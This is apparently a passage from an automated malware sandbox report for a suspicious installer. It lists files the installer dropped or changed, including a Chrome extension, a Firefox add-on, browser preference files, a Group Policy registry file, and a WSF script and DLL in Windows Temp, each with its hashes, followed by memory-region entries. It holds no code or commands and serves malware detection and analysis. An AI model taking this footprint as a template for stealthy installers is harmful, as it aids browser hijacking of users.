                                                                                                                c0c4a92b10e26c21e14cf902d5e9b499e001f21ea486c2ff8bcd4377b7d3ff53

                                                                                                                SHA512

                                                                                                                08dff8dc1a4daff7d744f1e80baafa046f44ce4287503b83fa414e2a8f526fb88757f1e20875c13203cb4b07300bc50372e8bd3808ae305d7904b13f1556eeb4

                                                                                                              • C:\Program Files (x86)\lkliFOiDrNJU2\ijcwtXc.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                424677b7e797d6aec42a7451640e42ab

                                                                                                                SHA1

                                                                                                                17b82168c694ecb5a330ee6664b74a9bef3482ea

                                                                                                                SHA256

                                                                                                                785a4c9c02d390727aa9895764c089916f4a3627a3f01f0de2fadf885660fb83

                                                                                                                SHA512

                                                                                                                1d5c508882315672a7c23b3d211fcc0bc78cb00ed31145509dd588daa23d0ea9bff83b2c5261dc2be64b256cabb63864698baba31d3560e430b59e66350b922d

                                                                                                              • C:\Program Files (x86)\qpguEeVzU\oYqlGOD.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                b7a48e3d99d654b1fef145498a8ab783

                                                                                                                SHA1

                                                                                                                0304c0b09993c499a1a1675c4dceffb182a29626

                                                                                                                SHA256

                                                                                                                25f36412919fd1e626053ac04d6b8051eb1edda2e385a617ed324a4947f4bb15

                                                                                                                SHA512

                                                                                                                031247849e79795cf81da4aa4c19bcb88a4c5bc70cc1d5b0e8ca2f54c922628a053f1b0f6182302b0e05428e7aeda48e061495258c5dfdfd3ae763adb8cdb5de

                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                                MD5

                                                                                                                b987a6e2dd6ab4a410b13b1e0ffd4ebd

                                                                                                                SHA1

                                                                                                                60087efd6b1aefa02136280399506414bb15bf9b

                                                                                                                SHA256

                                                                                                                3fccfb6a404e2f1c203cd5ba74a2d728767667b8ba7046e86775f08be61f4756

                                                                                                                SHA512

                                                                                                                28be887d7b148327e4165250bb3292ac6c85c482a19c10270c6f73c414b7f2fae6f0d1eb78d27050e100da0938074ed402662d630595ee2c1bacbe3b345789b8

                                                                                                              • C:\ProgramData\kyGmhDrgQBsTgrVB\AeUtUUO.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                faea4f488f7e6ca8eced798e4969fac0

                                                                                                                SHA1

                                                                                                                34c366c9bc07374a059a801391b8a5a00da3cb6b

                                                                                                                SHA256

                                                                                                                125833312477b37195adbc8f33dd1d4397d03de974f3342a02cdbe760c4fc1ca

                                                                                                                SHA512

                                                                                                                d7edf477c544539507e70d2690d354687e57c27acdf1fd0f7583d1bb5b6875cde0d5417387fe8c2150d3f2b89befaf55f7c8a8eb7bd7b384b86afa2075e02ad9

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                Filesize

                                                                                                                187B

                                                                                                                MD5

                                                                                                                2a1e12a4811892d95962998e184399d8

                                                                                                                SHA1

                                                                                                                55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                SHA256

                                                                                                                32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                SHA512

                                                                                                                bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                Filesize

                                                                                                                136B

                                                                                                                MD5

                                                                                                                238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                SHA1

                                                                                                                0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                SHA256

                                                                                                                801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                SHA512

                                                                                                                2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                Filesize

                                                                                                                150B

                                                                                                                MD5

                                                                                                                0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                SHA1

                                                                                                                6a51537cef82143d3d768759b21598542d683904

                                                                                                                SHA256

                                                                                                                0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                SHA512

                                                                                                                5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                83836dfbf7d127bc4eab07ff65ed2bf8

                                                                                                                SHA1

                                                                                                                c3301d33c8ad1626092044e80e047519daa8e819

                                                                                                                SHA256

                                                                                                                71437b3db2917c56e06f7cd531fb80c309355b7e443dbd30fb1a031eb7fb51f5

                                                                                                                SHA512

                                                                                                                c7077528f8780d12fc36bfc9d85851a2a0d6c73bcfbdf47959cab6777165904cb0961a1ad9b933285979c82b39a4ff279d24b1adfb54f409d634a03c8f0cd4ce

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                Filesize

                                                                                                                26KB

                                                                                                                MD5

                                                                                                                51ba8496a49fc54ac1673c3875a10c65

                                                                                                                SHA1

                                                                                                                6c7c773d0e91deb42dccdfc633e3e32347189b1d

                                                                                                                SHA256

                                                                                                                50d6a4b614c03aefbb4e9a978a9a466dd9ca47fbf2af36a1fe68db89ff23777f

                                                                                                                SHA512

                                                                                                                7d2f7296d7e95b9d2adb807c83ce70bb594247751ae171877f1ed4a2f85c94d609d6a745972ca3563c4ccae80cbb8c4315bdbc97d89c6ba38c552995e3fe7418

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                                MD5

                                                                                                                ff259a1ef5f27e89f8ced491856e5944

                                                                                                                SHA1

                                                                                                                30d9845bb957afb1c4be65e7e890d820ce3852d3

                                                                                                                SHA256

                                                                                                                fa18af8d5f65f11a6123c3f699fc1beed2cd95d8a262652b5fcb131fe76dce5d

                                                                                                                SHA512

                                                                                                                9d7d23a97828b2624b6da4feaafee2b4dda01fbbf2cece97cbc78abee77c2aa33762fd731a3b2f783ae3f8a4f7689ed235906475a201bc330ad38b32b2aa1fcb

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                                MD5

                                                                                                                78f479205a405a941d67de65132d601e

                                                                                                                SHA1

                                                                                                                694c4d779e299e031f00693a8c5d8784aed340c5

                                                                                                                SHA256

                                                                                                                d320933d8cfbc70aa3a5019a178a014a472398e0865bfee71c0dcb74809de856

                                                                                                                SHA512

                                                                                                                74ee3b85fa89ff86245521f0297fb3fc88348a1f15d429e1b140f2131bbc01d1d0732cec51abbca096fa789a7c9cb6f07b373f39a22b3dcbf615b415f1099604

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KRI7Z96XC7J0FS7BAL39.temp

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                                MD5

                                                                                                                51144f4b92906672834049112b0d977b

                                                                                                                SHA1

                                                                                                                c5f5bbe702dd6c20b5aa2a01c04d46b60fa6ad8d

                                                                                                                SHA256

                                                                                                                a831441501f3e2fa2fe32ff721d213d41d430ac099eea9b7e1400967d7042683

                                                                                                                SHA512

                                                                                                                9d63494f875b2d7ece843e92016173f29c13e8e7b062d24238f378127d9932cd645776044b8d0c9658cdbe02a6c981f6d142e000008c178d805da2998c34e194

                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs.js

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                                MD5

                                                                                                                7206332d8f3d6af36bd34554e0d25169

                                                                                                                SHA1

                                                                                                                1638bb7d08189ef6d13310ef456ea4c8dde01b3b

                                                                                                                SHA256

                                                                                                                0f7a594f37b8007771dad1d2462a216267e9ad5289e29edb2708e1dec6d20a9a

                                                                                                                SHA512

                                                                                                                2ed8dccc090640fe09a953f11b4b65e289f89b0eaace07cfb042fd4a6afcaf79246946c9cb20b70474f4ab10dc91f25a39fc70cadb69707784cc6d2371e3fccf

                                                                                                              • C:\Windows\Temp\YQhqHXZBhguGrggk\BAWmrlfI\QbRHwVmQfBqurumJ.wsf

                                                                                                                Filesize

                                                                                                                9KB

                                                                                                                MD5

                                                                                                                d870f0a21859ce532f1a4a3de5d3b6e9

                                                                                                                SHA1

                                                                                                                23c78d163d1dcf4926fabe4e72f4e2044c764084

                                                                                                                SHA256

                                                                                                                30e00e864364e48eae0b85e6e5ac0ad66f6439357fbcb0a4ac288b1bc69eb9fd

                                                                                                                SHA512

                                                                                                                226361f653b6e4579b6248d297339c1bc44efb32de6162b8e4fec9ce5949e8f4e9d01091c7c037c872a8517df4e0d7bc6e8e9503159a688b832c585cefb5c9ab

                                                                                                              • C:\Windows\Temp\YQhqHXZBhguGrggk\LjMEaVyd\htuLnak.dll

                                                                                                                Filesize

                                                                                                                6.4MB

                                                                                                                MD5

                                                                                                                5d7d245dc25f2b693e44ce58e33fd07d

                                                                                                                SHA1

                                                                                                                7620c6d082b1c0a1c2009a3c00fa4c8481c9e285

                                                                                                                SHA256

                                                                                                                4592d36c21347a779acd0977acb766a652ba7a4604ae9484ed87c887d03d906b

                                                                                                                SHA512

                                                                                                                0a3ee680e0bd01264fd8eca09578f2e45cc82da309ec5ca26fa221e1cf1b166542590a6f220cc0c0eb0e16274c944384f9d99971df77678f00758abb04ef8abb

                                                                                                              • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                                MD5

                                                                                                                ab06b322ca85f76aee6f4a21ff42f10a

                                                                                                                SHA1

                                                                                                                ae247f7ff50f1db3eec667a03dfb2f8c43f7e4e5

                                                                                                                SHA256

                                                                                                                8c07f524ed869a3fa9eb82e4e47491dd8272bda8ff9ffedcd9765615005223b1

                                                                                                                SHA512

                                                                                                                74a852f3e3447ebe563a76be5269f156b902cb676343171c802e68796f52bce0cc8d3622c0853cea792bb6762fe99220f7cbdab435f02624dec5f767dc12ba16

                                                                                                              • \Users\Admin\AppData\Local\Temp\7zS13BF.tmp\Install.exe

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                                MD5

                                                                                                                26532bd09a63ff0f80d1e7bcd33b8921

                                                                                                                SHA1

                                                                                                                9a49ab389193010a46ec584bb141996925af7bd6

                                                                                                                SHA256

                                                                                                                980b6033d540e8e947c87047a54ab7954ac3e6dce72c25271da49f175165ae61

                                                                                                                SHA512

                                                                                                                401a7099c04baa9487b73d30a6d77e7743220610fe5bc987dda91e9d0c5ce0b924586ee7affb482486d8950d431d627b9175681037ce39f6695f7ac26075ab16

                                                                                                              • \Users\Admin\AppData\Local\Temp\7zS696.tmp\Install.exe

                                                                                                                Filesize

                                                                                                                6.4MB

                                                                                                                MD5

                                                                                                                654aa0d84fd79f7e0712b8d80d99a96a

                                                                                                                SHA1

                                                                                                                1a770ba71779161bac7f02ecd26dcc67f6ed20a7

                                                                                                                SHA256

                                                                                                                23f7b88d6026e5499c21bb868be8b28cf963b4e0c5e044494bc02234fe05ff6f

                                                                                                                SHA512

                                                                                                                7e78c9395fa7bea5e965e925ec5fbf3ddb1531915eba0c39b5c1d3468159c740445d7abf659b463f74bbd4baa5811d74ed8a5ed5228c1b23a10d18c580639198

                                                                                                              • memory/748-46-0x0000000000B70000-0x0000000001226000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/748-60-0x0000000000B70000-0x0000000001226000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/748-91-0x0000000000B70000-0x0000000001226000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/748-49-0x0000000010000000-0x00000000125E3000-memory.dmp

                                                                                                                Filesize

                                                                                                                37.9MB

                                                                                                              • memory/1652-59-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/1652-58-0x000000001B570000-0x000000001B852000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.9MB

                                                                                                              • memory/1860-87-0x0000000001310000-0x00000000019C6000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1860-321-0x0000000002E70000-0x0000000002EF9000-memory.dmp

                                                                                                                Filesize

                                                                                                                548KB

                                                                                                              • memory/1860-137-0x00000000022F0000-0x0000000002355000-memory.dmp

                                                                                                                Filesize

                                                                                                                404KB

                                                                                                              • memory/1860-94-0x0000000010000000-0x00000000125E3000-memory.dmp

                                                                                                                Filesize

                                                                                                                37.9MB

                                                                                                              • memory/1860-207-0x0000000001310000-0x00000000019C6000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1860-366-0x0000000001310000-0x00000000019C6000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/1860-335-0x0000000003E80000-0x0000000003F59000-memory.dmp

                                                                                                                Filesize

                                                                                                                868KB

                                                                                                              • memory/1860-104-0x0000000001280000-0x0000000001305000-memory.dmp

                                                                                                                Filesize

                                                                                                                532KB

                                                                                                              • memory/2032-24-0x0000000001550000-0x0000000001C06000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2032-41-0x0000000001550000-0x0000000001C06000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2032-29-0x0000000010000000-0x00000000125E3000-memory.dmp

                                                                                                                Filesize

                                                                                                                37.9MB

                                                                                                              • memory/2032-26-0x0000000000E90000-0x0000000001546000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2032-25-0x0000000001550000-0x0000000001C06000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2032-23-0x0000000001550000-0x0000000001C06000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2032-42-0x0000000001550000-0x0000000001C06000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2032-43-0x0000000000E90000-0x0000000001546000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2056-38-0x0000000002460000-0x0000000002B16000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2056-22-0x0000000002460000-0x0000000002B16000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.7MB

                                                                                                              • memory/2524-358-0x0000000001460000-0x0000000003A43000-memory.dmp

                                                                                                                Filesize

                                                                                                                37.9MB

                                                                                                              • memory/2580-69-0x000000001B780000-0x000000001BA62000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.9MB

                                                                                                              • memory/2580-70-0x00000000022D0000-0x00000000022D8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB